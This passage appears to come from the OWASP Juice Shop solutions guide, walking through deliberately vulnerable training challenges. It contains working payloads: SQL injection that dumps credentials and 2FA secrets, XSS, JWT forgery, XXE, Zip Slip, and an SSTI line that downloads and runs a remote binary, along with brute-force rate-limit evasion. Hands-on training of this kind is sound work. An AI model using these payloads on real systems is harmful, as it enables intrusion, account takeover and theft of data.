Searching for ')) UNION SELECT * FROM Users-- fails with a promising SQLITE_ERROR: SELECTs to the left and right of UNION do not have the same number of result columns which least confirms the table name.

The next step in a UNION SELECT-attack is typically to find the right number of returned columns. As the Search Results table in the UI has 3 columns displaying data, it will probably at least be three. You keep adding columns until no more SQLITE_ERROR occurs (or at least it becomes a different one):

Next you get rid of the unwanted product results changing the query into something like qwert')) UNION SELECT '1', '2', '3', '4', '5', '6', '7', '8', '9' FROM Users-- leaving only the "UNIONed" element in the result set

The last step is to replace the fixed values with correct column names. You could guess those or derive them from the RESTful API results or remember them from previously seen SQL errors while attacking the Login form.

Searching for qwert')) UNION SELECT id, email, password, '4', '5', '6', '7', '8', '9' FROM Users-- solves the challenge giving you a the list of all user data in convenient JSON format.

Solve Access a developer’s forgotten backup file

Checking the dependencies in package.json.bak for known vulnerabilities online will give you a match (at least) for

Visit http://localhost:3000/#/contact

Visit http://localhost:3000/#/contact.

Enter <<script>Foo</script>iframe src="javascript:alert(`xss)">` as Comment

Choose a rating and click Submit

Visit http://localhost:3000/#/about for a first "xss" alert (from the Customer Feedback slideshow)

Visit http://localhost:3000/#/administration for a second "xss" alert (from the Customer Feedback table)

Log in as any user.

Visit http://localhost:3000/#/privacy-security/last-login-ip where your IP Address probably shows as 0.0.0.0.

Log out and then log in again with the same user as before.

Visit http://localhost:3000/#/privacy-security/last-login-ip again where your IP Address should now show your actual remote IP address (or 127.0.0.1 if you run the application locally).

Find the request to https://localhost:3000/rest/saveLoginIp in your Browser DevTools.

Replay the request after adding the X-Forwarded-For HTTP header to spoof an arbitrary IP, e.g. 1.2.3.4.

Unfortunately in the response (and also on http://localhost:3000/#/privacy-security/last-login-ip after logging in again) you will still find your remote IP as before

Repeat step 6. only with the proprietary header True-Client-IP.

In the JSON response you will notice lastLoginIp: "1.2.3.4" and after logging in again you will see 1.2.3.4 as your IP Address on http://localhost:3000/#/privacy-security/last-login-ip.

Replay the request once more with True-Client-IP: <iframe src="javascript:alert(xss)"> to solve this seriously obscure challenge.

Log in again and visit http://localhost:3000/#/privacy-security/last-login-ip see the alert popup.

Open the main.js in your browser’s developer tools and search for some keywords like "ico", "token", "bitcoin" or "altcoin".

Note the names of the JavaScript functions where these occur in, like Vu() and Hu(l). These names are obfuscated, so they might be different for you.

Searching for references to those functions in main.js might yield some more functions, like zu(l) and some possible route name app-token-sale

Navigate to http://localhost:3000//app-token-sale or variations like http://localhost:3000//token-sale just to realize that these routes do not exist.

After some more chasing through the minified code, you should realize that Vu is referenced in the route mappings that already helped with Find the carefully hidden 'Score Board' page and Access the administration section of the store but not to a static title. It is mapped to another variable Ca (which might be named differently for you)

Search for function Ca( to find the declaration of the function that should return a matcher to the route name you are looking for.

Copy the obfuscating function into the JavaScript console of your browser and execute it immediately by appending a (). This will probably yield a Uncaught SyntaxError: Unexpected token ). When you pass values in, like (1) or ('a') you will notice that the input value is simply returned.

Comparing the route mapping to others shows you that here a matcher is mapped to a component whereas most other mappings map a path to their component.

The code that gives you the sought-after path is the code block passed into the match() function inside Ca(l)!

Copying that inner code block and executing that in your console will still yield an error!

You need to append it to a string to make it work, which will finally yield the path /tokensale-ico-ea.

Navigate to http://localhost:3000/#/tokensale-ico-ea to solve this challenge.

Log in as anyone.

Inspecting the backend HTTP calls of the Password Change form reveals that these happen via HTTP GET and submits current and new password in clear text.

Probe the responses of /rest/user/change-password on various inputs:

Now Log in with Bender’s user account using SQL Injection.

Craft a GET request with Bender’s Authorization Bearer header to http://localhost:3000/rest/user/change-password?new=slurmCl4ssic&repeat=slurmCl4ssic to solve the challenge.

Log in with any user and go to http://localhost:3000/#/deluxe-membership

Right-click and Inspect the image of the delivery boxes with the Juice Shop logo on them.

You will notice that this image is in fact an inline <svg> tag that includes six <image> tags. One is loading assets/public/images/deluxe/blankBoxes.png and the other five load assets/public/images/JuiceShop_Logo.png in different sizes and positions onto the SVG graphic.

Open the main.js in your browser DevTools and search for the corresponding Angular controller code related to that page and SVG image

You will be able to spot six :svg:image references, one of them blankBoxes.png and the other five seemingly unspecified at that time.

Scrolling only slightly further down, you will notice a code location where a property t.logoSrc is passed into some non-descriptive function five times.

Scroll up in the source code a few hundred lines until you reach the declaration of the controller (class Ht in the following screenshot). There you find the definition of this.logoSrc = "assets/public/images/JuiceShop_Logo.png".

In the subsequent ngOnInit() function is overwritten with either the application.logo value coming out of the getApplicationConfiguration() service…​

…​or - if specified - the value of the URL query parameter testDecal! It seems the developers used this for testing the overlay images on the SVG but forgot to remove it before go-live! D’uh!

Try the testDecal parameter, e.g. by going to http://localhost:3000/#/deluxe-membership?testDecal=test. You will notice that the logos on the boxes are now gone or display a broken image symbol.

As the logo references are relative, you cannot simply do e.g. http://localhost:3000/#/deluxe-membership?testDecal=https:%2F%2Fplacekitten.com%2Fg%2F400%2F500 as this would result in the application to request the logos from the relative URL assets/public/images/https://placekitten.com/g/400/500 which obviously cannot work.

As you are dealing with a relative path, you can try if path traversal works, so you could get to the root of the web server e.g. via http://localhost:3000/#/deluxe-membership?testDecal=..%2F..%2F..%2Ftest. This will indeed result in the image actually being requested as http://localhost:3000/test!

It might not seem like it, but this behavior is a huge step forward! If the Juice Shop web server only offered a URL which would be able to redirect you to any external location and grab those images…​

…​which it does in the form of the http://localhost:3000/redirect endpoint! If you haven’t done so yet, you should stop here and Enforce a redirect to a page you are not supposed to redirect to first!

Combining that redirect exploit with the forgotten testDecal and its susceptibility to path traversal will allow you to craft a URL like http://localhost:3000/#/deluxe-membership?testDecal=..%2F..%2F..%2F..%2Fredirect%3Fto%3Dhttps:%2F%2Fplacekitten.com%2Fg%2F400%2F500%3Fx%3Dhttps:%2F%2Fgithub.com%2Fbkimminich%2Fjuice-shop where the most difficult part is to get the URL encoding just right to bypass the redirect allowlist and still get the intended image returned cross-domain.

Visit https://stackoverflow.com/questions/tagged/access-log to find all questions tagged with access-log in this popular platform

The list of questions should not be excessive and one mentioning a familiar URL path might immediately stand out

Visit https://stackoverflow.com/questions/57061271/less-verbose-access-logs-using-expressjs-morgan to find more unambiguous URL paths from the Juice Shop in it

Follow the link to PasteBin that is mentioned below the log file snippet in "(see https://pastebin.com/4U1V1UjU for more)"

On https://pastebin.com/4U1V1UjU search for password to find log entries that might help with the ultimate challenge goal

You will find one particularly interesting GET request that has been logged as 161.194.17.103 - - [27/Jan/2019:11:18:35 +0000] "GET /rest/user/change-password?current=0Y8rMnww$*9VFYE%C2%A759-!Fg1L6t&6lB&new=sjss22%@%E2%82%AC55jaJasj!.k&repeat=sjss22%@%E2%82%AC55jaJasj!.k8 HTTP/1.1" 401 39 "http://localhost:3000/" "Mozilla/5.0 (Linux; Android 8.1.0; Nexus 5X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.99 Mobile Safari/537.36"

The mismatched new and repeat parameters and the return code of 401 indicate that this password change failed. This means the password could still be the current one of 0Y8rMnww$*9VFYE%C2%A759-!Fg1L6t&6lB!

This isn’t the exact clear text password, though. It was logged as part of a URL, so it needs to be URL-decoded into 0Y8rMnww$*9VFYE§59-!Fg1L6t&6lB first.

Not knowing which user it belongs to, you can now

Either way you will conclude that the password belongs to J12934@juice-sh.op so using this as Email and 0Y8rMnww$*9VFYE§59-!Fg1L6t&6lB as Password on http://localhost:3000/#/login will solve the challenge

Find a request to the /rest/user/whoami API endpoint. Notice that you can remove the "Authorization" header and it still works.

Add a URL parameter called "callback". This will cause the API to return the content as a JavaScript fragment (JSONP) rather than just a standard JSON object.

Go to http://localhost:3000/#/login and try logging in with Email ' and any Password while observing the Browser DevTools network tab.

You will notice the SQL query for the login in the error being thrown: "sql": "SELECT * FROM Users WHERE email = ''' AND password = '339df5aeae5bc6ae557491e02619c5dd' AND deletedAt IS NULL"

Solve Exfiltrate the entire DB schema definition via SQL Injection to learn the exact column names of the Users table.

Prepare a UNION SELECT payload what will a) ensure there is no result from the original query and b) will add the needed user on-the-fly using static values in the query.

Log in with Email ' UNION SELECT * FROM (SELECT 15 as 'id', '' as 'username', 'acc0unt4nt@juice-sh.op' as 'email', '12345' as 'password', 'accounting' as 'role', '123' as 'deluxeToken', '1.2.3.4' as 'lastLoginIp' , '/assets/public/images/uploads/default.svg' as 'profileImage', '' as 'totpSecret', 1 as 'isActive', '1999-08-16 14:14:41.644 +00:00' as 'createdAt', '1999-08-16 14:33:41.930 +00:00' as 'updatedAt', null as 'deletedAt')--

This will trick the application backend into handing out a valid JWT token and thus establishing a user session.

Monitoring the HTTP calls to the backend when switching languages tells you how the translations are loaded:

It is obvious the language files are stored with the official locale as name using underscore notation.

Nonetheless, even brute forcing all thinkable locale codes (aa_AA, ab_AA, …​, zz_ZY, zz_ZZ) would still not solve the challenge.

The hidden language is Klingon which is represented by a three-letter code tlh with the dummy country code AA.

Request http://localhost:3000/i18n/tlh_AA.json to solve the challenge. majQa'!

Access the administration section of the store while inspecting network traffic.

You will learn the email address of the user in question is unsurprisingly wurstbrot@juice-sh.op.

You will also notice that there is no information about any user’s 2FA configuration in the responses from /api/Users.

Solve Retrieve a list of all user credentials via SQL Injection and keep its final attack payload ready.

Change the one of the nulls in payload to hopefully find a column that contains the secret key for the 2FA setup:

In the response from http://localhost:3000/rest/products/search?q=%27))%20union%20select%20null,id,email,password,totpsecret,null,null,null,null%20from%20users-- find the entry of user wurstbrot@juice-sh.op with "image":"IFTXE3SPOEYVURT2MRYGI52TKJ4HC3KH" whereas all other users have "image":"" set.

Using your favorite 2FA application (e.g. Google Authenticator) create a new entry, but instead of scanning any QR code type in the key IFTXE3SPOEYVURT2MRYGI52TKJ4HC3KH manually.

Go to http:localhost:3000/#/login and use SQL Injection to log in with wurstbrot@juice-sh.op'-- as Username and anything as Password.

You will be presented with the Two Factor Authentication input screen where you now have to type in the 6-digit code currently displayed on your 2FA app.

After clicking Log in you are logged in and the challenge will be marked as solved!

Log in as any user to receive a valid JWT in the Authorization header.

Copy the JWT (i.e. everything after Bearer ` in the `Authorization header) and decode it.

Under the payload property, change the email attribute in the JSON to jwtn3d@juice-sh.op.

Change the value of the alg property in the header part from HS256 to none.

Encode the header to base64url. Similarly, encode the payload to base64url. base64url makes it URL safe, a regular Base64 encode might not work!

Join the two strings obtained above with a . (dot symbol) and add a . at the end of the obtained string. So, effectively it becomes base64url(header).base64url(payload).

Change the Authorization header of a subsequent request to the retrieved JWT (prefixed with Bearer ` as before) and submit the request. Alternatively you can set the `token cookie to the JWT which be used to populate any future request with that header.

Open the network tab of your browser’s DevTools.

Log in with any user that previously ordered something and visit http://localhost:3000/#/order-history

Click on the Track Order button (depicting a truck) of any order

Witness a GET request to a URL starting with http://localhost:3000/rest/track-order/ and ending with a seemingly random sequence of characters (which is actually the Order ID)

Try out http://localhost:3000/rest/track-order/x to receive a response of {"status":"success","data":[{"orderId":"x"}]}.

Search for ' (single quote) as Order ID now. http://localhost:3000/rest/track-order/' will throw an error

Searching for '' (two single quotes) as Order ID now will let http://localhost:3000/rest/track-order/'' throw an Unexpected string error instead of the previous Invalid or unexpected token.

While not stated anywhere in the error messages, it can be assumed with some MongoDB background that the query probably resembles something like { $where: "property === '" + payload + "'" }.

The required payload for the challenge needs to make sure all data is matched while squeezing itself into the query in a non-breaking way.

Search for ' || true || ' resulting in http://localhost:3000/rest/track-order/'%20%7C%7C%20true%20%7C%7C%20' which will in fact query and return all orders from the MarsDB.

By manual or automated URL discovery you can find a Swagger API documentation hosted at http://localhost:3000/api-docs which describes the B2B API.

This API allows to POST orders where the order lines can be sent as JSON objects (orderLines) but also as a String (orderLinesData).

The given example for orderLinesDate indicates that this String might be allowed to contain arbitrary JSON: [{"productId": 12,"quantity": 10000,"customerReference": ["PO0000001.2", "SM20180105|042"],"couponCode": "pes[Bh.u*t"},...]

Click the Try it out button and without changing anything click Execute to see if and how the API is working. This will give you a 401 error saying No Authorization header was found.

Go back to the application, log in as any user and copy your token from the Authorization Bearer header using your browser’s DevTools.

Back at http://localhost:3000/api-docs/#/Order/post_orders click Authorize and paste your token into the Value field.

Click Try it out and Execute to see a successful 200 response.

An insecure JSON deserialization would execute any function call defined within the JSON String, so a possible payload for a DoS attack would be an endless loop. Replace the example code with {"orderLinesData": "(function dos() { while(true); })()"} in the Request Body field. Click Execute.

The server should eventually respond with a 200 after roughly 2 seconds, because that is defined as a timeout so you do not really DoS your Juice Shop server.

If your request successfully bumped into the infinite loop protection, the challenge is marked as solved.

Trying to find out who "Bjoern" might be should quickly lead you to the OWASP Juice Shop project leader and author of this ebook.

Visit https://www.facebook.com/bjoern.kimminich to immediately learn that he is from the town of Uetersen in Germany.

Visit https://gist.github.com/9045923 or https://pastebin.com/JL5E0RfX to find the source code of a (truly amazing) game Bjoern wrote in Turbo Pascal in 1995 (when he was a teenager) to learn his phone number area code of 04122 which belongs to Uetersen. This is sufficient proof that you in fact are on the right track.

http://www.geopostcodes.com/Uetersen will tell you that Uetersen has ZIP code 25436.

Visit http://localhost:3000/#/forgot-password and provide bjoern@juice-sh.op as your Email.

In the subsequently appearing form, provide 25436 as Your ZIP/postal code when you were a teenager?

Type and New Password and matching Repeat New Password followed by hitting Change to not solve this challenge.

Bjoern added some obscurity to his security answer by using an uncommon variant of the pre-unification format of postal codes in Germany.

Visit http://www.alte-postleitzahlen.de/uetersen to learn that Uetersen’s old ZIP code was W-2082. This would not work as an answer either. Bjoern used the written out variation: West-2082.

Change the answer to Your ZIP/postal code when you were a teenager? into West-2082 and click Change again to finally solve this challenge.

Trying to find out who "Morty" might be should eventually lead you to Morty Smith as the most likely user identity

Visit http://rickandmorty.wikia.com/wiki/Morty and skim through the Family section

It tells you that Morty had a dog named Snuffles which also goes by the alias of Snowball for a while.

Visit http://localhost:3000/#/forgot-password and provide morty@juice-sh.op as your Email

Create a word list of all mutations (including typical "leet-speak"-variations!) of the strings snuffles and snowball using only

Write a script that iterates over the word list and sends well-formed requests to http://localhost:3000/rest/user/reset-password. A rate limiting mechanism will prevent you from sending more than 100 requests within 5 minutes, severely hampering your brute force attack.

Change your script so that it provides a different X-Forwarded-For-header in each request, as this takes precedence over the client IP in determining the origin of a request.

Rerun your script you will notice at some point that the answer to the security question is 5N0wb41L and the challenge is marked as solved.

Feel free to cancel the script execution at this point.

The description of the OWASP Juice Shop Logo (3D-printed) product indicates that this product might actually have kind of a blueprint

Download the product image from http://localhost:3000/public/images/products/3d_keychain.jpg and view its Exif metadata

Researching the camera model entry OpenSCAD reveals that this is a program to create 3D models, which works with .stl files

As no further hint on the blueprint filename or anything is given, a lucky guess or brute force attack is your only choice

Download http://localhost:3000/assets/public/images/products/JuiceShop.stl to solve this challenge

This model will actually allow you to 3D-print your own OWASP Juice Shop logo models!

Solve Access a developer’s forgotten backup file

The package.json.bak contains not only runtime dependencies but also development dependencies under the devDependencies section.

Go through the list of devDependencies and perform research on vulnerabilities in them which would allow a Software Supply Chain Attack.

For the eslint-scope module you will learn about one such incident exactly in the pinned version 3.7.2, e.g. https://status.npmjs.org/incidents/dn7c1fgrr7ng or https://eslint.org/blog/2018/07/postmortem-for-malicious-package-publishes

Both above links refer to the original report of this vulnerability on GitHub: https://github.com/eslint/eslint-scope/issues/39

Visit http://localhost:3000/#/contact

Submit your feedback with https://github.com/eslint/eslint-scope/issues/39 in the comment to solve this challenge

Request http://localhost:3000/3rdpartylicenses.txt to retrieve the 3rd party license list generated by Angular CLI by default

Combing through the list of modules you will come across ngy-cookie which openly reveals its intent on https://www.npmjs.com/package/ngy-cookie

Visit http://localhost:3000/#/contact

Submit your feedback with ngy-cookie in the comment to solve this challenge

Solve the Use a deprecated B2B interface that was not properly shut down challenge.

On Linux, prepare an XML file which defines and uses an external entity which will require a long time to resolve: <!ENTITY xxe SYSTEM "file:///dev/random">. On Windows there is no similar feature to retrieve randomness from the OS via an "endless" file, so the attack vector has to be completely different. A quadratic blowup attack works fine, consisting of a single large entity like <!ENTITY a "dosdosdosdos...dos"> which is replicated very often as in <foo>&a;&a;&a;&a;&a;...&a;</foo>.

Upload this file through the File Complaint dialog and observe how the request processing takes up to 2 seconds and then times out (to prevent you from actually DoS’ing your application) but still solving the challenge.

The Chatbot is built using an npm module called 'juicy-chat-bot'. The source code for the same can be found here

Looking through the source, one can determine that user messages are processed inside a VM context, with a function called process

The vulnerable segment of the code is this statement, that the bot uses to remember usernames. The command this.factory.run(users.addUser("${token}", "${name}")) is equivalent to an eval statement inside the VM context. This can be exploited by including " and ) in one’s username

If one sets their username to admin"); process=null; users.addUser("1337", "test, the final statement that gets executed would be

Log in with any user account and go to Account > Privacy and Security > Request Data Erasure.

Fill in the fields Confirm Email Address and Answer with random data and submit. Using your browser’s developer tools or an intercepting proxy, notice that a POST request is issued with two body parameters (email and securityAnswer)

Using your favorite fuzzing tool and wordlist, start to fuzz the body parameters.

Notice an unhandled 500 Internal Server Error when a parameter layout is provided in the request. Also, notice that the error response says Error: ENOENT: no such file or directory indicating that we might have hit the LFR vulnerability. We can also see the full pathname of the file the application is trying to access: <root_directory>/juice-shop/views/<value_of_layout_parameter>

Based on the previous error message, we can guess (or bruteforce) a valid filename. For example, issuing another POST request with the following body will solve the challenge: layout=../package.json

Combing through the updates of the @owasp_juiceshop Twitter account you will notice https://twitter.com/owasp_juiceshop/status/1107781073575002112.

Researching ZIP-based vulnerabilities should also yield Zip Slip which exploits directory traversal filenames in file archives.

As the Legal Information file you need to override lives in http://localhost:3000/ftp/legal.adoc and uploading files via File Complaint does not give any feedback where they are stored, an iterative directory traversal approach is recommended.

Prepare a ZIP file (on Linux) with zip exploit.zip ../ftp/legal.adoc.

Log in as any user at http://localhost:3000/#/login.

Click Contact Us and Complain? to get to the File Complaint screen at http://localhost:3000/#/complain.

Type in any message and attach your ZIP file, then click Submit.

The challenge will not be solved. Repeat steps 5-7 but with zip exploit.zip ../../ftp/legal.adoc as the payload.

The challenge will be marked as solved! When you visit http://localhost:3000/ftp/legal.adoc you will see your overwritten Legal Information!

Solve any other challenge

Inspect the cookies in your browser to find a continueCode cookie

The package.json.bak contains the library used for generating these continue codes: hashid

Visit http://hashids.org/ to get some information about the mechanism

Follow the link labeled check out the demo (http://codepen.io/ivanakimov/pen/bNmExm)

The Juice Shop simply uses the example salt (this is my salt) and also the default character range (abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890) from that demo page. It just uses a minimum length of 60 instead of 8 for the resulting hash.

Encoding the value 999 with the demo (see code below) gives you the hash result 69OxrZ8aJEgxONZyWoz1Dw4BvXmRGkM6Ae9M7k2rK63YpqQLPjnlb5V5LvDj

Send a PUT request to the URL http://localhost:3000/rest/continue-code/apply/69OxrZ8aJEgxONZyWoz1Dw4BvXmRGkM6Ae9M7k2rK63YpqQLPjnlb5V5LvDj to solve this challenge.

Liking a review normally results in a request to http://localhost:3000/rest/products/reviews which associates the email of the user with the review (identified by the JSON body of e.g. {id: "ZQdzyRCbwQ4ys3PCG"}) and also increases its like counter by one.

If you try to replay the same request you will get a 403 Forbidden HTTP status with {"error":"Not allowed"} in the response.

Write a script that simultaneously executes three requests to http://localhost:3000/rest/products/reviews with body e.g. {id: "ZQdzyRCbwQ4ys3PCG"} and run it.

If your 3 requests get handled asynchronously within an (artificial) 150ms time window, you will cause a race condition and all will get through and each increase the like counter by one to a total of three!

Back in your browser you should now see the corresponding challenge marked as solved!

Find out that the support team’s email address is support@juice-sh.op eiher via deduction of the pattern from other users or by completing the Retrieve a list of all user credentials via SQL Injection challenge.

Brute forcing the password on of this user <httpc://localhost:3000/#/login> is an entirely hopeless approach.

You might notice that the support team has a KeePass database file located in http://localhost:3000/ftp/incident-support.kdbx and that it is conveniently not blocked by the file type filter otherwise protecting this folder.

Download and install KeePass 2.x from http://keepass.info

Trying to brute force the password on this KeePass file is unlikely to succeed at this stage.

Inspecting main.js for information leakage (e.g. by searching for support) will yield an interesting log statement that is printed when the support logs in with the wrong password:

The logged text is in Romanian language: Parola echipei de asistență nu respectă politica corporativă pentru conturile privilegiate! Vă rugăm să schimbați parola în consecință!

Running this through an online translator yields something like: The password of the support team does not respect the corporate policy for privileged accounts! Please change your password accordingly!

More interesting even is the Regular Expression (?=.[a-z])(?=.[A-Z])(?=.\d)(?=.[@$!%?&])[A-Za-z\d@$!%?&]{12,30} being used to check for a specific password pattern. You can assume that this is the equivalent of the mentioned corporate policy.

This RegEx translates into the following password requirements

Note also, that this RegEx would not accept any other special characters or letters than the ones mentioned above.

Assume that the support team followed the password policy for its user password and also for its KeePass file.

Furthermore, presume that they might have used a weaker password on their KeePass database, because their normal workflow might involve getting the user credentials from it when logging in to the application. Therefore, the KeePass file should be easier to break into.

Use a brute force script (applying the password pattern restrictions known to you) to break into the KeePass file with the terribly chosen password Support2022!.

Find the password for the support team user account in the prod entry of the KeePass file.

Log in with support@juice-sh.op as Email and J6aVjTgOpRs@?5l!Zkq2AYnCE@RF$P as Password to beat this challenge.

Inspecting the HTML source of the corresponding row in the Score Board table reveals a HTML comment that is obviously encrypted: <!--IvLuRfBJYlmStf9XfL6ckJFngyd9LfV1JaaN/KRTPQPidTuJ7FR+D/nkWJUF+0xUF07CeCeqYfxq+OJVVa0gNbqgYkUNvn//UbE7e95C+6e+7GtdpqJ8mqm4WcPvUGIUxmGLTTAC2+G9UuFCD1DUjg==-->.

This is a cipher text that came out of an AES-encryption using AES256 in CBC mode.

To get the key and the IV, you should run a Forced Directory Browsing attack against the application. You can use OWASP ZAP for this purpose.

In order to decrypt the cipher text, it is best to use openssl.

Visit http://localhost:3000/this/page/is/hidden/behind/an/incredibly/high/paywall/that/could/only/be/unlocked/by/sending/1btc/to/us to solve this challenge and marvel at the premium VR wallpaper! (Requires dedicated hardware to be viewed in all its glory.)

Follow steps 1-7 of the challenge Perform a Remote Code Execution that would keep a less hardened application busy forever.

As Request Body put in {"orderLinesData": "/((a+)+)b/.test('aaaaaaaaaaaaaaaaaaaaaaaaaaaaa')"} - which will trigger a very costly Regular Expression test once executed.

Submit the request by clicking Execute.

The server should eventually respond with a 503 status and an error stating Sorry, we are temporarily not available! Please try again later. after roughly 2 seconds. This is due to a defined timeout so you do not really DoS your Juice Shop server.

Solve Infect the server with "juicy malware" by abusing arbitrary command execution at least to the point where you have access to the "juicy malware" executables.

Similar to that SSTi challenge, the vulnerable place for this one is found on the http://localhost:3000/profile page.

The only promising input field for an SSRF attack is the Gravatar URL. Open your browser’s DevTools and watch the Network tab.

Type any URL (e.g. https://placekitten.com/100/100) into Gravatr URL and click Link Gravatar. You will realize a request http://localhost:3000/profile/image/url with the chosen https://placekitten.com/100/100 as parameter imageUrl.

You will find no HTTP request to https://placekitten.com/100/100 going out from your browser, though. As the image was retrieved and associated with your profile, it must have been downloaded by the Juice Shop server.

To solve this challenge, you need to find a secret URL hidden inside the "juicy malware" and simulate a self-targeted SSRF attack with it.

Use your favorite decompiler(s) to see what is going on inside the malware program…​

…​or execute the malware while tunneling all its traffic through a proxy.

Either way you should be able to identify the URL being called by it is http://localhost:3000/solve/challenges/server-side?key=tRy_H4rd3r_n0thIng_iS_Imp0ssibl3

Visiting that URL directly will not do anything, as it needs to be called through the Gravatar Link field that was presumably vulnerable to SSRF

Paste the URL in and click Link Gravatar to get the expected challenge solved notification!

Perform the totally obvious Google search for juicy malware to find https://github.com/J12934/juicy-malware

Alternatively you also find three .url files with direct links in http://localhost:3000/ftp/quarantine but you’ll probably need to understand how to solve any of Access a developer’s forgotten backup file, Access a salesman’s forgotten backup file or Access a misplaced SIEM signature file first.

Your goal is to use RCE to make the server download and execute the malware version for the server OS, so on Linux you might want to run something like wget -O malware https://github.com/J12934/juicy-malware/blob/master/juicy_malware_linux_64?raw=true && chmod +x malware && ./malware

You probably realized by now that http://localhost:3000/profile is not an Angular page? This page is written using Pug which happens to be a Template engine and therefore perfectly suited for SSTi mischief.

Set your Username to 1+1 and click Set Username. Your username will be just shown as 1+1 under the profile picture.

Trying template injection into Pug set Username to #{1+1} and click Set Username. Your username will now be shown as 2 under the profile picture!

Craft a payload that will abuse the lack of encapsulation of JavaScript’s global.process object to dynamically load a library that will allow you to spawn a process on the server that will then download and execute the malware.

The payload might look like #{global.process.mainModule.require('child_process').exec('wget -O malware https://github.com/J12934/juicy-malware/blob/master/juicy_malware_linux_64?raw=true && chmod +x malware && ./malware')}. Submit this as Username and (on a Linux server) the challenge should be marked as solved

The author tweeted about a new promotion video back in v8.5.0 from his personal account, openly spoilering the URL http://localhost:3000/promotion

After changing the video sported on the promotion page in v12.5.0, the Juice Shop’s own Twitter account published another message, this time spoilering the URL http://demo.owasp-juice.shop/promotion

Visit http://localhost:3000/promotion to watch the video advertising the benefits of an OWASP membership! You will notice that it comes with subtitles enabled by default.

Right-click and select View Source on the page to learn that it loads its video from http://localhost:3000/video and that the subtitles are directly embedded in the page itself.

Inspecting the response for http://localhost:3000/video in the Network tab of your DevTools shows an interesting header Content-Location: /assets/public/videos/owasp_promo.mp4

Trying to access the video directly at http://localhost:3000/assets/public/videos/owasp_promo.mp4 works fine.

Getting a directory listing for http://localhost:3000/assets/public/videos does not work unfortunately.

Knowing that the subtitles are in WebVTT format (from step 3) a lucky guess would be that a corresponding .vtt file is available alongside the video.

Accessing http://localhost:3000/assets/public/videos/owasp_promo.vtt proves this assumption correct.

As the subtitles are not loaded separately by the client, they must be embedded on the server side. If this embedding happens without proper safeguards, an XSS attack would be possible if the subtitles files could be overwritten.

The prescribed XSS payload also hints clearly at the intended attack against the subtitles, which are themselves enclosed in a <script> tag, which the payload will try to close prematurely with its starting </script>.

To successfully overwrite the file, the Zip Slip vulnerability behind the Overwrite the Legal Information file challenge can be used.

The blind part of this challenge is the actual file location in the server file system. Trying to create a Zip file with any path trying to traverse into ../../assets/public/videos/ will fail. Notice that ../../ was sufficient to get to the root folder in Overwrite the Legal Information file.

This likely means that there is a deeper directory structure in which assets/ resides.

This actual directory structure on the server is created by the AngularCLI tool when it compiles the application, but is unfortunately not fully leaked anywhere in the client-side code.

You can get a hint on a possible base directory frontend/ from http://localhost:3000/main.js and several other JavaScript files you find in the Sources tab of your Browser’s DevTools from the fact that they all start with "use strict";(self.webpackChunkfrontend=self.webpackChunkfrontend||[]) where frontend is the Angular project name.

Trying ../../frontend/assets/public/videos/ will still fail as your Zip Slip directory traversal payload.

Either by intense brute-forcing, lucky guessing or heavy googling you might eventually end up with a path prefix of frontend/dist/frontend/ in which assets/ resides on the server. Thus, the path you need to work with, is frontend/dist/frontend/assets/. Note that there really is no "right" way to find this out, but here are some possible ways:

Prepare a ZIP file with a owasp_promo.vtt inside that contains the prescribed payload of </script><script>alert(`xss)</script>` with zip exploit.zip ../../frontend/dist/frontend/assets/public/video/owasp_promo.vtt (on Linux).

Upload the ZIP file on http://localhost:3000/#/complain.

The challenge notification will not trigger immediately, as it requires you to actually execute the payload by visiting http://localhost:3000/promotion again.

You will see the alert box and once you go Back the challenge solution should trigger accordingly.

Visit the Digital Wallet(/wallet) from the Orders & Payment Section in the Account dropdown.

Find the link to the new crypto wallet at the right side of the container.

Search for the name of the functions that interact with the Deposit and Withdraw functionality on the page, "eth deposit" and "withdraw" respectively and the address of the Juice Shop Wallet contract "0x413744D59d31AFDC2889aeE602636177805Bd7b0".

Use the Remix Online IDE or the Juice Shop Web3 Sandbox to write your own contract script for exploiting the contract.

Make sure to use the same metamask wallet as connected on the Juice Shop Web3 Wallet page for the attack.

We need to write a script contract for a Reentrancy attack, the most common and vulnerable form of exploit for contracts.

Below is a sample contract for the same:

Compile and Deploy the contract on the Sepolia testnet.

Execute the attack function by depositing some ETH which successfully exploits the wallet.